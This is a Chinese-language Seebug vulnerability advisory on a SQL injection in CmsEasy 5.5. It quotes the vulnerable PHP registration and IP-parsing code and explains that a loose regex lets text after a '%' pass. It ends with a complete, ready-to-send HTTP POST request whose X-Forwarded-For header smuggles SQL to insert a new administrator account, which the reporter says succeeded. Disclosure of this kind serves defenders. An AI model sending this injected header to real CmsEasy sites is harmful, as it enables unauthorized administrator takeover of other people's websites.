CmsEasy最新版SQL注入可注册管理员

2014-06-04T00:00:00
ID SSV:94017
Type seebug
Reporter Root
Modified 2014-06-04T00:00:00

Description

简要描述:

CmsEasy最新版SQL注入可注册管理员

详细说明:

CmsEasy_5.5_UTF-8_20140420.rar 官方最新版存在SQL注入,无视GPC,可获取管理员账户,可注册管理员 不知道跟之前蓝哥的那个重复么,先发再看吧。。。 文件/lib/default/user_act.php

``` function respond_action() { ini_set("display_errors","On"); $classname = front::$get['ologin_code']; if(front::post('regsubmit')) { if(!config::get('reg_on')) { front::flash(lang('网站已经关闭注册!')); return; } if(front::post('username') != strip_tags(front::post('username')) ||front::post('username') != htmlspecialchars(front::post('username')) ) { front::flash(lang('用户名不规范!')); return; } if(strlen(front::post('username'))<4) { front::flash(lang('用户名太短!')); return; }
if(front::post('username') &&front::post('password')) { $username=front::post('username'); $password=md5(front::post('password')); $data=array( 'username'=>$username, 'password'=>$password, 'groupid'=>101, 'userip'=>front::ip(), //======问题在这里====== $classname=>session::get('openid'), ); if($this->_user->getrow(array('username'=>$username))) { front::flash(lang('该用户名已被注册!')); return; } $insert=$this->_user->rec_insert($data); $_userid = $this->_user->insert_id(); if($insert){ front::flash(lang('注册成功!')); }else { front::flash(lang('注册失败!')); return; } $user=$data; cookie::set('login_username',$user['username']); cookie::set('login_password',front::cookie_encode($user['password'])); session::set('username',$user['username']); front::redirect(url::create('user')); exit; } }

    if (front::post('submit')) {
        if (front::post('username') && front::post('password')) {
            $username = front::post('username');
            $password = md5(front::post('password'));
            $data = array(
                'username' =&gt; $username,
                'password' =&gt; $password,
            );
            $user = new user();
            $row = $user-&gt;getrow(array('username' =&gt; $data['username'], 'password' =&gt; $data['password']));
            if (!is_array($row)) {
                $this-&gt;login_false();
                return;
            }
            $post[$classname] = session::get('openid');
            $this-&gt;_user-&gt;rec_update($post, 'userid=' . $row['userid']);
            cookie::set('login_username', $row['username']);
            cookie::set('login_password', front::cookie_encode($row['password']));
            session::set('username', $row['username']);
            front::redirect(url::create('user'));
            return;
        } else {
            $this-&gt;login_false();
            return;
        }
    }

    include_once ROOT.'/lib/plugins/ologin/'.$classname.'.php';
    $ologinobj = new $classname();
    $status = $ologinobj-&gt;respond();
    //var_dump(session::get('openid'));exit;
    $where[$classname] = session::get('openid');
    if(!$where[$classname]) front::redirect(url::create('user'));
    $user = new user();
    $data = $user-&gt;getrow($where);
    if(!$data){
        $this-&gt;view-&gt;data = $status;
    }else{
        cookie::set('login_username',$data['username']);
        cookie::set('login_password',front::cookie_encode($data['password']));
        session::set('username',$data['username']);
        front::redirect(url::create('user'));
    }
}

```

我们再进入ip()函数: 文件/lib/tool/front_class.php

static function ip() { if ($_SERVER['HTTP_CLIENT_IP']) { $onlineip = $_SERVER['HTTP_CLIENT_IP']; } elseif ($_SERVER['HTTP_X_FORWARDED_FOR']) { $onlineip = $_SERVER['HTTP_X_FORWARDED_FOR']; } elseif ($_SERVER['REMOTE_ADDR']) { $onlineip = $_SERVER['REMOTE_ADDR']; } else { $onlineip = $_SERVER['REMOTE_ADDR']; } if(config::get('ipcheck_enable')){ if(!preg_match('/^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/', $onlineip)&&!preg_match('@^\s*((([0-9A-Fa-f]{1,4}:){7}(([0-9A-Fa-f]{1,4})|:))|(([0-9A-Fa-f]{1,4}:){6}(:|((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})|(:[0-9A-Fa-f]{1,4})))|(([0-9A-Fa-f]{1,4}:){5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){4}(:[0-9A-Fa-f]{1,4}){0,1}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){3}(:[0-9A-Fa-f]{1,4}){0,2}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){2}(:[0-9A-Fa-f]{1,4}){0,3}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:)(:[0-9A-Fa-f]{1,4}){0,4}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(:(:[0-9A-Fa-f]{1,4}){0,5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})))(%.+)?\s*$@', $onlineip)){ exit('来源非法'); } } return $onlineip; }

乍一看没什么问题,对ip进行了过滤 但是我们看看后面的那个正则的最后面: (%.+)?\s* 这里有一个%,然后后面可以跟任何内容,127.0.0.1%xxxxxx 这样也是符号正则的,这不就绕过了。。。。 难道这是后门?! 最后进入了:$insert=$this->_user->rec_insert($data); 导致了注入产生。。。

漏洞证明:

之前的用户信息:

<img src="https://images.seebug.org/upload/201406/04173851c32d6175893d49402f04ef758921b872.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

发送请求:

POST /cmseasy1/index.php?case=user&act=respond HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 66 X-Forwarded-For: 127.0.0.1%'),('xfkxfk','e10adc3949ba59abbe56e057f20f883e','2','127.0.0.1')# username=666666&password=666666&regsubmit=%2B%E6%B3%A8%E5%86%8C%2B

<img src="https://images.seebug.org/upload/201406/041739140b5bdd8506a372e702c392fecf8752bf.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

成功添加管理员xfkxfk

<img src="https://images.seebug.org/upload/201406/04173927c19d085b963cfb1d6b387cbe0b2216b0.png" alt="3.png" width="600" onerror="javascript:errimg(this);">